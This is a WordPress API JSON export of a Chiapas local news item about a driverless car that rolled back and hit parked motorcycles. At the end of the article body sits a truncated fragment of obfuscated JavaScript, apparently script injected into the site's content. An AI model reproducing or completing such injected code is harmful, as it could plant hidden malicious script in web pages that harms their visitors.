{"id":20240,"date":"2025-02-07T03:55:34","date_gmt":"2025-02-07T03:55:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20240"},"modified":"2025-02-07T03:55:35","modified_gmt":"2025-02-07T03:55:35","slug":"automovil-sin-frenos-impacta-motos-estacionadas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20240","title":{"rendered":"Autom\u00f3vil sin frenos impacta motos estacionadas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250206-WA0044-1024x768.jpg\" alt=\"\" class=\"wp-image-20241\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250206-WA0044-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250206-WA0044-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250206-WA0044-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250206-WA0044.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 6 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un autom\u00f3vil Vw Virtus sin control de color gris sin control embisti\u00f3 a cuatro motocicletas una puerta y una ventana de cristal.<\/p>\n\n\n\n<p>Este hecho ocurri\u00f3 este jueves por la ma\u00f1ana cuando el propietario de la unidad dej\u00f3 el carro afuera de su vivienda ubicada sobre la carretera a Villaflores para cerrar el port\u00f3n.<\/p>\n\n\n\n<p>Sin embargo, el coche retrocedi\u00f3 30 metros sin conductor.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito municipal y los afectados llegaron a un acuerdo armonioso.<\/p>\n\n\n\n<p>Un ajustador de seguros garantiz\u00f3 el pago de los da\u00f1os.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 6 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un autom\u00f3vil Vw Virtus sin control de color gris sin control embisti\u00f3 a cuatro motocicletas una puerta y una ventana de cristal. Este hecho ocurri\u00f3 este jueves por la ma\u00f1ana cuando el propietario de la unidad dej\u00f3 el carro afuera de su vivienda &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20241,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20240","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20240","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20240"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20240\/revisions"}],"predecessor-version":[{"id":20242,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20240\/revisions\/20242"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20241"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20240"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20240"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20240"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}